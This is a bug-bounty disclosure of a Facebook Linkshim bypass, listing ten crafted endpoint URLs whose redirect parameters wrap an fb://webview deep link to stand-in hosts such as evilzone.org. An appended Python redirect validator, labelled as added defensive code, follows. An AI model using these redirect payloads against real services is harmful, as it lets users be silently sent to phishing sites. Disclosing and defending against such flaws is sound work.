Facebook: Linkshim protection bypass using fb://webview

Using the fb://webview deep link it is possible to bypass linkshim protection: the user is redirected to the evilzone site without any notice.


Timeline:

  1. 12 September 2018 : Reported
  2. 13 September 2018 : Triaged
  3. 05 November 2020 : Bounty Paid
  4. 14 November 2020 : Fix was released at server side.

The vulnerable endpoints were:

1. https://mbasic.facebook.com/a/feed_menu.php?story_fbid=xx&id=10000xx&menu_id=u_0_0&continue=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttps%3A%2F%2Fevilzone.org&action=us&gfid=xx

Using continue button

2. https://m.facebook.com/friends/selector/?return_uri=4&cancel_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&friends_key=ids&context&add_photos_uri&is_initial_render=0

Using cancel button

3. https://mbasic.facebook.com/stickers/229247431430xx/?redirect_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttps%3A%2F%2Fevilzone.org

4. https://mbasic.facebook.com/messages/photo/?ids&tids%5B0%5D=cid.g.251480506187xxxx&message_text&cancel=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org

5. https://mbasic.facebook.com/search/tabselector/?current_tab=keywords_top&cancel_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&query=ok&is_local_serp=0&is_trending=0&vertical=content&refid=46&ref=Footer

6. https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevil.com

7. https://mbasic.facebook.com/tokenizer/single/?mode=share_msg&sid=91916771814xxxx&returnURI=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&zero_e=2&zero_et=1536231748&_rdc=1&_rdr

8. https://mbasic.facebook.com/photos/xtag_faces/?photo_id=1020467036791xxxx&owner_id=18157600xx&return_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&refid=13

9. https://mbasic.facebook.com/privacyx/selector/?redirect_uri=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&content_id=8787365733&content_type=1&selected_param=28695816140xxxx&autosave=1

10. https://mbasic.facebook.com/friends/hovercard/mbasic/?uid=4&redirectURI=fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org

Without user interaction
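As an added, defender-side example that is not part of the original report: a Python validator for the redirect-style parameters used by the endpoints above (continue, cancel_uri, redirect_uri, return_uri, redirectURI, returnURI, groupuri, cancel) that unwraps fb://webview/?url=... deep links and checks the inner target against a host allowlist, which is what a server-side fix for this class of bypass needs to do. The allowlist, the parameter-name set and the function names are assumptions for illustration.

```python
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed allowlist: hosts a redirect parameter may legitimately point at.
ALLOWED_HOSTS = {"facebook.com", "m.facebook.com", "mbasic.facebook.com"}

# Constructed set of parameter names seen carrying the deep link in the report.
REDIRECT_PARAMS = {"continue", "cancel_uri", "redirect_uri", "return_uri",
                   "redirectURI", "returnURI", "groupuri", "cancel"}


def _host_allowed(host: str) -> bool:
    host = host.lower().rstrip(".")
    return host in ALLOWED_HOSTS or any(host.endswith("." + h) for h in ALLOWED_HOSTS)


def is_safe_redirect(value: str) -> bool:
    """True only if the redirect target stays on allowlisted hosts.

    fb://webview/?url=... is unwrapped and its inner url is validated with
    the same rules, so an external host hidden inside the deep link is
    rejected instead of being passed through unchecked."""
    target = unquote(value)
    if "\\" in target or any(c in target for c in "\r\n\t"):
        return False                      # browsers may normalise these into // or split headers
    parts = urlsplit(target)
    scheme = parts.scheme.lower()
    if scheme in ("http", "https") or (scheme == "" and parts.netloc):
        return _host_allowed(parts.hostname or "")   # absolute or protocol-relative URL
    if scheme == "fb" and parts.netloc.lower() == "webview":
        inner = parse_qs(parts.query).get("url", [])
        return len(inner) == 1 and is_safe_redirect(inner[0])
    if scheme == "":
        return True                       # relative reference, resolves on the current origin
    return False                          # javascript:, data:, other deep links, ...


def unsafe_redirect_params(request_url: str) -> list[str]:
    """Names of redirect-style query parameters in request_url whose value
    would leave the allowlisted hosts (directly or via fb://webview)."""
    qs = parse_qs(urlsplit(request_url).query, keep_blank_values=True)
    return sorted(k for k, vals in qs.items()
                  if k in REDIRECT_PARAMS and any(not is_safe_redirect(v) for v in vals))


if __name__ == "__main__":
    # Constructed request mirroring endpoint 2 above.
    req = ("https://m.facebook.com/friends/selector/?return_uri=4&cancel_uri="
           "fb%3A%2F%2Fwebview%2F%3Furl%3Dhttp%3A%2F%2Fevilzone.org&friends_key=ids")
    print(unsafe_redirect_params(req))   # ['cancel_uri']
```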